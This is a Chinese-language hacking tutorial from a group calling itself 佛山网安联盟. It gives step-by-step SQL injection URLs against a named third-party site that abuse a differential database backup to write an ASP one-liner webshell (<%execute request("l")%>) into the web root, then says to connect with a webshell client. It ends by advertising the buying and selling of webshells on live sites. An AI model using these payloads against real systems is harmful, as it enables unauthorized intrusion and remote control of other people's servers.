<sql注射点备份差异拿WEBSELL>> 浪漫的麟仔 QQ:112214981 佛山网安联盟出品

佛山网安联盟:http://www.cnsy.com.cn
================================================================================================

大家好,我是浪漫的麟仔,好久没为大家做教程了,今天我们来学习一下备份差异拿WEBSELL,

现在网上存在的SQL注入的网站实在是太多了,大家只要细心找找,就会找到一大堆出来,今天我们主要是学习

针对DB_OWNER权限的注射点,SA权限的我就不说了,直接提系统权限或者传马就行了.

备份差异的方法:

一:(备份当前库)http://www.artsweb.com.cn/artnews/content.asp?id=1466;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737334383630 backup database @a to disk=@s--

0x737334383630数据的名字转16进制了.我建的是heige

二:(建表加字段)http://www.artsweb.com.cn/artnews/content.asp?id=1466;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--

三:(加入一句话木马)http://www.artsweb.com.cn/artnews/content.asp?id=1466;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--

0x3C2565786563757465207265717565737428226C2229253E一句话木马的16进制代码

<%execute request("l")%>

四:http://www.artsweb.com.cn/artnews/content.asp?id=1466;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x443A5C496E65747075625C617274737765625C636E73792E617370DA backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

0x443A5C496E65747075625C617274737765625C636E73792E617370DA是WEB物理路径径:D:\Inetpub\artsweb\cnsy.asp

五:(撤除刚刚建立的库)http://www.artsweb.com.cn/artnews/content.asp?id=1466;Drop table [heige]--

上面的就是备份差异的方法,菜鸟可能看不明白,我们也可以用xiaolu的一个工具,getwebshell2,快捷方式几下就

可以把一句话木马备份出来了,

大家还是看我的操作吧.

然后我们访问刚刚备份得出的cnsy.asp看到了一大堆乱码,我们看看网页的最底,如果出现错误就表示插入木马成

功了,

Microsoft VBs cript 运行时错误 错误 '800a000d'

类型不匹配: 'execute'

/cnsy.asp，行3202

最后一部,我们用一句话木马的控制端进行连接,大家看我的操,很简单的.

最后打个广告:出售收购有流量WEBSHELL,有意者加我QQ.

我们佛山网安联盟正在组织一个有组织有纪律有技术有人情味的团队,即使你是菜鸟也可以加入我们的团队,(免费)不收一分钱,

注意:加入者要有良好的思想道德,不乱到处黑人,有爱国情操..

有意思者可以把申请书发送到:ybl008@gmail.com(注明加入我们的团队,和加入的目的,加入后会怎样做.等)

我们会在一两天内把QQ群号发到你的EMAIL里.

(没特别事别加我的QQ,人全满了)技术交流可以到论坛或者加下面的群:

佛山网安联盟群号:3567293 2552613 12881763 12881972 12882139